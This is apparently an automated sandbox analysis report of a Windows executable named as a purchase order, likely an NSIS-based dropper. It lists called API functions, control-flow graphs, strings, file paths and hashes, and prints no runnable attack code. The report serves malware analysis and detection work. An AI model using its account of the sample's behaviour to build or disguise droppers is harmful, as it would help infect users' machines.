4624 402562 4623->4624 4625 40254b 4623->4625 4627 402596 4624->4627 4628 402567 4624->4628 4626 402ba2 18 API calls 4625->4626 4633 402552 4626->4633 4630 402bbf 18 API calls 4627->4630 4629 402bbf 18 API calls 4628->4629 4631 40256e WideCharToMultiByte lstrlenA 4629->4631 4632 40259d lstrlenW 4630->4632 4631->4633 4632->4633 4634 4025e0 4633->4634 4636 405e34 5 API calls 4633->4636 4637 4025ca 4633->4637 4635 405e05 WriteFile 4635->4634 4636->4637 4637->4634 4637->4635 4638 4014b8 4639 4014be 4638->4639 4640 401389 2 API calls 4639->4640 4641 4014c6 4640->4641 3968 4015b9 3969 402bbf 18 API calls 3968->3969 3970 4015c0 3969->3970 3971 405bdd 4 API calls 3970->3971 3985 4015c9 3971->3985 3972 401629 3974 40165b 3972->3974 3975 40162e 3972->3975 3973 405b5f CharNextW 3973->3985 3977 401423 25 API calls 3974->3977 3976 401423 25 API calls 3975->3976 3978 401635 3976->3978 3984 401653 3977->3984 3987 40617e lstrcpynW 3978->3987 3979 405829 2 API calls 3979->3985 3981 405846 5 API calls 3981->3985 3982 401642 SetCurrentDirectoryW 3982->3984 3983 40160f GetFileAttributesW 3983->3985 3985->3972 3985->3973 3985->3979 3985->3981 3985->3983 3986 4057ac 4 API calls 3985->3986 3986->3985 3987->3982 4649 40293b 4650 402ba2 18 API calls 4649->4650 4651 402941 4650->4651 4652 402964 4651->4652 4653 40297d 4651->4653 4659 40281e 4651->4659 4654 402969 4652->4654 4655 40297a 4652->4655 4656 402993 4653->4656 4657 402987 4653->4657 4663 40617e lstrcpynW 4654->4663 4664 4060c5 wsprintfW 4655->4664 4658 4061a0 18 API calls 4656->4658 4660 402ba2 18 API calls 4657->4660 4658->4659 4660->4659 4663->4659 4664->4659

                                                                  Executed Functions

                                                                  Function 004033B6 Relevance: 91.4, APIs: 34, Strings: 18, Instructions: 401stringfilecomCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 4033b6-4033e9 SetErrorMode GetVersion 1 4033eb-4033f3 call 406558 0->1 2 4033fc 0->2 1->2 7 4033f5 1->7 4 403401-403415 call 4064e8 lstrlenA 2->4 9 403417-40348b call 406558 * 2 #17 OleInitialize SHGetFileInfoW call 40617e GetCommandLineW call 40617e GetModuleHandleW 4->9 7->2 18 403495-4034af call 405b5f CharNextW 9->18 19 40348d-403494 9->19 22 4034b5-4034bb 18->22 23 4035c6-4035e0 GetTempPathW call 403385 18->23 19->18 25 4034c4-4034c8 22->25 26 4034bd-4034c2 22->26 30 4035e2-403600 GetWindowsDirectoryW lstrcatW call 403385 23->30 31 403638-403652 DeleteFileW call 402e41 23->31 28 4034ca-4034ce 25->28 29 4034cf-4034d3 25->29 26->25 26->26 28->29 32 403592-40359f call 405b5f 29->32 33 4034d9-4034df 29->33 30->31 48 403602-403632 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403385 30->48 51 403703-403713 ExitProcess OleUninitialize 31->51 52 403658-40365e 31->52 49 4035a1-4035a2 32->49 50 4035a3-4035a9 32->50 37 4034e1-4034e9 33->37 38 4034fa-403533 33->38 39 4034f0 37->39 40 4034eb-4034ee 37->40 41 403550-40358a 38->41 42 403535-40353a 38->42 39->38 40->38 40->39 41->32 47 40358c-403590 41->47 42->41 46 40353c-403544 42->46 55 403546-403549 46->55 56 40354b 46->56 47->32 57 4035b1-4035bf call 40617e 47->57 48->31 48->51 49->50 50->22 59 4035af 50->59 53 403839-40383f 51->53 54 403719-403729 call 4058c3 ExitProcess 51->54 60 4036f3-4036fa call 4039c7 52->60 61 403664-40366f call 405b5f 52->61 66 403841-403857 GetCurrentProcess OpenProcessToken 53->66 67 4038bd-4038c5 53->67 55->41 55->56 56->41 69 4035c4 57->69 59->69 71 4036ff 60->71 77 403671-4036a6 61->77 78 4036bd-4036c7 61->78 75 403859-403887 LookupPrivilegeValueW AdjustTokenPrivileges 66->75 76 40388d-40389b call 406558 66->76 72 4038c7 67->72 73 4038cb-4038cf ExitProcess 67->73 69->23 71->51 72->73 75->76 88 4038a9-4038b4 ExitWindowsEx 76->88 89 40389d-4038a7 76->89 80 4036a8-4036ac 77->80 81 4036c9-4036d7 call 405c3a 78->81 82 40372f-403743 call 405846 lstrcatW 78->82 84 4036b5-4036b9 80->84 85 4036ae-4036b3 80->85 81->51 98 4036d9-4036ef call 40617e * 2 81->98 96 403750-40376a lstrcatW lstrcmpiW 82->96 97 403745-40374b lstrcatW 82->97 84->80 91 4036bb 84->91 85->84 85->91 88->67 90 4038b6-4038b8 call 40140b 88->90 89->88 89->90 90->67 91->78 96->51 99 40376c-40376f 96->99 97->96 98->60 101 403771-403776 call 4057ac 99->101 102 403778 call 405829 99->102 107 40377d-40378b SetCurrentDirectoryW 101->107 102->107 110 403798-4037c1 call 40617e 107->110 111 40378d-403793 call 40617e 107->111 115 4037c6-4037e2 call 4061a0 DeleteFileW 110->115 111->110 118 403823-40382b 115->118 119 4037e4-4037f4 CopyFileW 115->119 118->115 120 40382d-403834 call 40601f 118->120 119->118 121 4037f6-403816 call 40601f call 4061a0 call 40585e 119->121 120->51 121->118 130 403818-40381f CloseHandle 121->130 130->118
                                                                  APIs
                                                                  • SetErrorMode.KERNELBASE ref: 004033D9
                                                                  • GetVersion.KERNEL32 ref: 004033DF
                                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403408
                                                                  • #17.COMCTL32(00000007,00000009), ref: 0040342B
                                                                  • OleInitialize.OLE32(00000000), ref: 00403432
                                                                  • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 0040344E
                                                                  • GetCommandLineW.KERNEL32(00429240,NSIS Error), ref: 00403463
                                                                  • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\PO_00290292.exe",00000000), ref: 00403476
                                                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\PO_00290292.exe",00000020), ref: 0040349D
                                                                    • Part of subcall function 00406558: GetModuleHandleA.KERNEL32(?,00000020,?,0040341F,00000009), ref: 0040656A
                                                                    • Part of subcall function 00406558: GetProcAddress.KERNEL32(00000000,?), ref: 00406585
                                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004035D7
                                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004035E8
                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004035F4
                                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403608
                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403610
                                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403621
                                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403629
                                                                  • DeleteFileW.KERNELBASE(1033), ref: 0040363D
                                                                    • Part of subcall function 0040617E: lstrcpynW.KERNEL32(?,?,00000400,00403463,00429240,NSIS Error), ref: 0040618B
                                                                  • ExitProcess.KERNEL32(?), ref: 00403703
                                                                  • OleUninitialize.OLE32(?), ref: 00403708
                                                                  • ExitProcess.KERNEL32 ref: 00403729
                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 0040373C
                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 0040374B
                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403756
                                                                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PO_00290292.exe",00000000,?), ref: 00403762
                                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040377E
                                                                  • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,?), ref: 004037D8
                                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\PO_00290292.exe,00420EE8,00000001), ref: 004037EC
                                                                  • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000), ref: 00403819
                                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403848
                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 0040384F
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403864
                                                                  • AdjustTokenPrivileges.ADVAPI32 ref: 00403887
                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 004038AC
                                                                  • ExitProcess.KERNEL32 ref: 004038CF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: Processlstrcat$ExitFile$Handle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                  • String ID: "C:\Users\user\Desktop\PO_00290292.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement$C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement$C:\Users\user\Desktop$C:\Users\user\Desktop\PO_00290292.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                  • API String ID: 354199918-1646223993
                                                                  • Opcode ID: 1d8223e16c8a6003b83d058067bded84b497836c53eb7fdc95fb885acef81e31
                                                                  • Instruction ID: be8551fa6605ebbbfda7487142ffb020be8bd547a3943651712312bea09c5587
                                                                  • Opcode Fuzzy Hash: 1d8223e16c8a6003b83d058067bded84b497836c53eb7fdc95fb885acef81e31
                                                                  • Instruction Fuzzy Hash: AED10571200300ABE7207F659D49A2B3AEDEB4074AF50443FF881B62D2DB7C8956876E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040541C Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 131 40541c-405437 132 4055c6-4055cd 131->132 133 40543d-405504 GetDlgItem * 3 call 404277 call 404b7a GetClientRect GetSystemMetrics SendMessageW * 2 131->133 135 4055f7-405604 132->135 136 4055cf-4055f1 GetDlgItem CreateThread FindCloseChangeNotification 132->136 153 405522-405525 133->153 154 405506-405520 SendMessageW * 2 133->154 138 405622-40562c 135->138 139 405606-40560c 135->139 136->135 143 405682-405686 138->143 144 40562e-405634 138->144 141 405647-405650 call 4042a9 139->141 142 40560e-40561d ShowWindow * 2 call 404277 139->142 157 405655-405659 141->157 142->138 143->141 146 405688-40568e 143->146 148 405636-405642 call 40421b 144->148 149 40565c-40566c ShowWindow 144->149 146->141 155 405690-4056a3 SendMessageW 146->155 148->141 151 40567c-40567d call 40421b 149->151 152 40566e-405677 call 4052dd 149->152 151->143 152->151 160 405535-40554c call 404242 153->160 161 405527-405533 SendMessageW 153->161 154->153 162 4057a5-4057a7 155->162 163 4056a9-4056d4 CreatePopupMenu call 4061a0 AppendMenuW 155->163 170 405582-4055a3 GetDlgItem SendMessageW 160->170 171 40554e-405562 ShowWindow 160->171 161->160 162->157 168 4056d6-4056e6 GetWindowRect 163->168 169 4056e9-4056fe TrackPopupMenu 163->169 168->169 169->162 173 405704-40571b 169->173 170->162 172 4055a9-4055c1 SendMessageW * 2 170->172 174 405571 171->174 175 405564-40556f ShowWindow 171->175 172->162 176 405720-40573b SendMessageW 173->176 177 405577-40557d call 404277 174->177 175->177 176->176 178 40573d-405760 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 176->178 177->170 180 405762-405789 SendMessageW 178->180 180->180 181 40578b-40579f GlobalUnlock SetClipboardData CloseClipboard 180->181 181->162
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,00000403), ref: 0040547A
                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00405489
                                                                  • GetClientRect.USER32(?,?), ref: 004054C6
                                                                  • GetSystemMetrics.USER32(00000002), ref: 004054CD
                                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054EE
                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004054FF
                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405512
                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405520
                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405533
                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405555
                                                                  • ShowWindow.USER32(?,00000008), ref: 00405569
                                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040558A
                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040559A
                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055B3
                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055BF
                                                                  • GetDlgItem.USER32(?,000003F8), ref: 00405498
                                                                    • Part of subcall function 00404277: SendMessageW.USER32(00000028,?,00000001,004040A3), ref: 00404285
                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004055DC
                                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_000053B0,00000000), ref: 004055EA
                                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004055F1
                                                                  • ShowWindow.USER32(00000000), ref: 00405615
                                                                  • ShowWindow.USER32(?,00000008), ref: 0040561A
                                                                  • ShowWindow.USER32(00000008), ref: 00405664
                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405698
                                                                  • CreatePopupMenu.USER32 ref: 004056A9
                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056BD
                                                                  • GetWindowRect.USER32(?,?), ref: 004056DD
                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056F6
                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040572E
                                                                  • OpenClipboard.USER32(00000000), ref: 0040573E
                                                                  • EmptyClipboard.USER32 ref: 00405744
                                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405750
                                                                  • GlobalLock.KERNEL32(00000000), ref: 0040575A
                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040576E
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040578E
                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405799
                                                                  • CloseClipboard.USER32 ref: 0040579F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                                  • String ID: (7B${
                                                                  • API String ID: 4154960007-525222780
                                                                  • Opcode ID: eb59534d035534922114e87074bc313431370419dc47d72610ca3581fdfcb614
                                                                  • Instruction ID: 3349dadf3efb3a8fdffdb79f187be012afacb07b5928e089a4a7fd9dccbac2fd
                                                                  • Opcode Fuzzy Hash: eb59534d035534922114e87074bc313431370419dc47d72610ca3581fdfcb614
                                                                  • Instruction Fuzzy Hash: 60B15670900608FFDB119FA0DD89EAE3B79FB48354F40847AFA45A61A0CB754E52DF68
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004061A0 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207stringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 430 4061a0-4061ab 431 4061ad-4061bc 430->431 432 4061be-4061d4 430->432 431->432 433 4061da-4061e7 432->433 434 4063ec-4063f2 432->434 433->434 437 4061ed-4061f4 433->437 435 4063f8-406403 434->435 436 4061f9-406206 434->436 438 406405-406409 call 40617e 435->438 439 40640e-40640f 435->439 436->435 440 40620c-406218 436->440 437->434 438->439 442 4063d9 440->442 443 40621e-40625a 440->443 444 4063e7-4063ea 442->444 445 4063db-4063e5 442->445 446 406260-40626b GetVersion 443->446 447 40637a-40637e 443->447 444->434 445->434 448 406285 446->448 449 40626d-406271 446->449 450 406380-406384 447->450 451 4063b3-4063b7 447->451 455 40628c-406293 448->455 449->448 452 406273-406277 449->452 453 406394-4063a1 call 40617e 450->453 454 406386-406392 call 4060c5 450->454 456 4063c6-4063d7 lstrlenW 451->456 457 4063b9-4063c1 call 4061a0 451->457 452->448 458 406279-40627d 452->458 468 4063a6-4063af 453->468 454->468 460 406295-406297 455->460 461 406298-40629a 455->461 456->434 457->456 458->448 464 40627f-406283 458->464 460->461 466 4062d6-4062d9 461->466 467 40629c-4062b9 call 40604b 461->467 464->455 469 4062e9-4062ec 466->469 470 4062db-4062e7 GetSystemDirectoryW 466->470 476 4062be-4062c2 467->476 468->456 472 4063b1 468->472 474 406357-406359 469->474 475 4062ee-4062fc GetWindowsDirectoryW 469->475 473 40635b-40635f 470->473 477 406372-406378 call 406412 472->477 473->477 480 406361-406365 473->480 474->473 479 4062fe-406308 474->479 475->474 476->480 481 4062c8-4062d1 call 4061a0 476->481 477->456 483 406322-406338 SHGetSpecialFolderLocation 479->483 484 40630a-40630d 479->484 480->477 486 406367-40636d lstrcatW 480->486 481->473 488 406353 483->488 489 40633a-406351 SHGetPathFromIDListW CoTaskMemFree 483->489 484->483 487 40630f-406316 484->487 486->477 491 40631e-406320 487->491 488->474 489->473 489->488 491->473 491->483
                                                                  APIs
                                                                  • GetVersion.KERNEL32(00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,?,00405314,Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,00000000,00000000,00000000), ref: 00406263
                                                                  • GetSystemDirectoryW.KERNEL32(Remove folder: ,00000400), ref: 004062E1
                                                                  • GetWindowsDirectoryW.KERNEL32(Remove folder: ,00000400), ref: 004062F4
                                                                  • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406330
                                                                  • SHGetPathFromIDListW.SHELL32(?,Remove folder: ), ref: 0040633E
                                                                  • CoTaskMemFree.OLE32(?), ref: 00406349
                                                                  • lstrcatW.KERNEL32(Remove folder: ,\Microsoft\Internet Explorer\Quick Launch), ref: 0040636D
                                                                  • lstrlenW.KERNEL32(Remove folder: ,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,?,00405314,Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,00000000,00000000,00000000), ref: 004063C7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                  • String ID: Remove folder: $Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                  • API String ID: 900638850-953462347
                                                                  • Opcode ID: 978d560dfc87019ac3657ebba0841bd774ce65c1ae89d16051c02eb976f42344
                                                                  • Instruction ID: 57c77dc533264c97ace6329bd87f7d674c2bea75a5b3d90d15d675b8bae5a73d
                                                                  • Opcode Fuzzy Hash: 978d560dfc87019ac3657ebba0841bd774ce65c1ae89d16051c02eb976f42344
                                                                  • Instruction Fuzzy Hash: 1E611571A00104EBDF209F24CC40AAE37A5AF15314F56817FED56BA2D0D73D8AA2CB9D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040596F Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 492 40596f-405995 call 405c3a 495 405997-4059a9 DeleteFileW 492->495 496 4059ae-4059b5 492->496 497 405b2b-405b2f 495->497 498 4059b7-4059b9 496->498 499 4059c8-4059d8 call 40617e 496->499 500 405ad9-405ade 498->500 501 4059bf-4059c2 498->501 505 4059e7-4059e8 call 405b7e 499->505 506 4059da-4059e5 lstrcatW 499->506 500->497 503 405ae0-405ae3 500->503 501->499 501->500 507 405ae5-405aeb 503->507 508 405aed-405af5 call 4064c1 503->508 509 4059ed-4059f1 505->509 506->509 507->497 508->497 516 405af7-405b0b call 405b32 call 405927 508->516 512 4059f3-4059fb 509->512 513 4059fd-405a03 lstrcatW 509->513 512->513 515 405a08-405a24 lstrlenW FindFirstFileW 512->515 513->515 517 405a2a-405a32 515->517 518 405ace-405ad2 515->518 532 405b23-405b26 call 4052dd 516->532 533 405b0d-405b10 516->533 521 405a52-405a66 call 40617e 517->521 522 405a34-405a3c 517->522 518->500 520 405ad4 518->520 520->500 534 405a68-405a70 521->534 535 405a7d-405a88 call 405927 521->535 524 405ab1-405ac1 FindNextFileW 522->524 525 405a3e-405a46 522->525 524->517 531 405ac7-405ac8 FindClose 524->531 525->521 528 405a48-405a50 525->528 528->521 528->524 531->518 532->497 533->507 538 405b12-405b21 call 4052dd call 40601f 533->538 534->524 539 405a72-405a7b call 40596f 534->539 545 405aa9-405aac call 4052dd 535->545 546 405a8a-405a8d 535->546 538->497 539->524 545->524 548 405aa1-405aa7 546->548 549 405a8f-405a9f call 4052dd call 40601f 546->549 548->524 549->524
                                                                  APIs
                                                                  • DeleteFileW.KERNELBASE(?,?,75573420,75572EE0,00000000), ref: 00405998
                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsp6601.tmp\*.*,\*.*), ref: 004059E0
                                                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405A03
                                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsp6601.tmp\*.*,?,?,75573420,75572EE0,00000000), ref: 00405A09
                                                                  • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsp6601.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsp6601.tmp\*.*,?,?,75573420,75572EE0,00000000), ref: 00405A19
                                                                  • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AB9
                                                                  • FindClose.KERNEL32(00000000), ref: 00405AC8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                  • String ID: "C:\Users\user\Desktop\PO_00290292.exe"$C:\Users\user\AppData\Local\Temp\nsp6601.tmp\*.*$\*.*
                                                                  • API String ID: 2035342205-1632907102
                                                                  • Opcode ID: 650d65efca721ae95f05fec5e6387b525ef9089e97d219b3eee7621c95804d20
                                                                  • Instruction ID: 6c547db7f4d1248ed83a6ec2b2b7cf99957869ea0eb35c9edb1a86952611c1c3
                                                                  • Opcode Fuzzy Hash: 650d65efca721ae95f05fec5e6387b525ef9089e97d219b3eee7621c95804d20
